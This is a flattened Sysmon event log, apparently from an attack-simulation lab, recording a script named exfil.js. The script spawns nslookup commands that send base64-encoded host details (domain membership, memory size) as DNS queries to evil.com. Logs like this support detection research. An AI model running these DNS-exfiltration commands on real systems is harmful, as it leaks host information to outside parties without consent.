14:16:19.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-17A1-629A-783D-000000005F02}55526248C:\Windows\System32\WScript.exe{2E1864BB-17B3-629A-053F-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.088{2E1864BB-17B3-629A-053F-000000005F02}7208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqoatn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.082{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwv.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.051{2E1864BB-17B2-629A-033F-000000005F02}80807796C:\Windows\system32\conhost.exe{2E1864BB-17B3-629A-043F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B3-629A-043F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.036{2E1864BB-17B2-629A-023F-000000005F02}652924C:\Windows\system32\cmd.exe{2E1864BB-17B3-629A-043F-000000005F02}6180C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.045{2E1864BB-17B3-629A-043F-000000005F02}6180C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-023F-000000005F02}652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnwv.tmp 2>&1 10341000x8000000000000000197036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.020{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-033F-000000005F02}8080C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.020{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-033F-000000005F02}8080C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:19.004{2E1864BB-17B2-629A-033F-000000005F02}80807796C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-023F-000000005F02}652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.982{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-033F-000000005F02}8080C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x800000000000000043923Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:17.699{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52323-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000043922Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:19.557{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B56194582BB19EFABC02092D4C69F5B9,SHA256=0B99F741F30EF7C700172FBC9BDE29506643ABC80404015C75ED019EBA820FD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.990{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-413F-000000005F02}6448C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-403F-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-17A1-629A-783D-000000005F02}55522128C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-403F-000000005F02}7396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.988{2E1864BB-17B4-629A-403F-000000005F02}7396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymznl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.974{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpxjws.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-17B4-629A-3E3F-000000005F02}29444932C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-3F3F-000000005F02}7236C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.959{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 